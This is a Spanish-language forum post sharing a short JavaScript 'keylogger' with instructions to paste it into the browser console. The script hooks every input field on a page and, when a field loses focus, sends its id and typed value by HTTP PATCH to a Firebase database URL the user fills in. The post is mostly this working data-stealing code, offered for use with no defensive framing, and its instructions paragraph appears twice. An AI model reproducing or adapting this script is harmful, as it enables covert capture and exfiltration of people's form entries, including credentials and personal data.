Bueno, básicamente les voy a dejar un código que desarrollé, muy simple de hecho, igual les voy a explicar cómo usarlo, si bien es cierto que se podría mejorar y mucho, así está hasta ahora, quizás siga trabajando en él, quizás no, pero les voy a compartir lo que va.
Necesitarán una URL de una base de datos, la crean acá http://firebase.google.com
Para inyectar el código lo único que tienen que hacer es abrir la consola "click derecho inspeccionar elemento de ahí en la tab de consola, en el navegador", copiar y pegar el código ya con su URL, cierran la consola y ya está, si cierran la página se pierden los cambios, si refrescan también. Espero les guste. SaluDDOS
Código [Seleccionar]
"strict";
var input = document.querySelectorAll("input"); //Selecciona todos los imput del navegador
function saveLocal(e) {
var url = "https://****.firebaseio.com/.json"; //Deben crear una base de datos en firebase y poner la URL acá
var method = "PATCH"; //Metodo HTTP
/*El e.srcElement trae el campo id="idEjemplo" y el this.value su valor el resultado sería algo como:
tel: 30123021
*/
var postData = '{ "' + e.srcElement.id + '": "' + this.value + '" }';
//XMLHttpRequest es un método usado en javascript para hacer peticiones HTTP como POST, GET, Etc, etc.
var request = new XMLHttpRequest();
request.onload = function () {
/*Ya acá se pueden obtener muchos tipos de respuestá del HTTP, ésto no es parte del keylogger en sí
Pero es útil si quieren ver info de la transacción en la consola
*/
var status = request.status; //respuesta del status HTTP, e.j., 200 for "200 OK"
var data = request.responseText; // Datos que retorna, e.j., un documento HTML o un JSON.
console.log(status);
console.log(data);
} //El onload es un evento que se lanza cuando la petición se carga
//Abre la petición, especifica el método, envía la URL y el false es para indicar que es sincrona
request.open(method, url, false);
//Luego de que la petición está abierta envía la info, en éste caso el log de los inputs
request.send(postData);
}
for (var i = 0; i < input.length; i++) {
//Añade a cada input un evento que escucha cuándo alquien sale de la casilla y llama a la función saveLocal
input[i].addEventListener("blur", saveLocal);
}//Loop por cada item en input
Necesitarán una URL de una base de datos, la crean acá http://firebase.google.com
Para inyectar el código lo único que tienen que hacer es abrir la consola "click derecho inspeccionar elemento de ahí en la tab de consola, en el navegador", copiar y pegar el código ya con su URL, cierran la consola y ya está, si cierran la página se pierden los cambios, si refrescan también. Espero les guste. SaluDDOS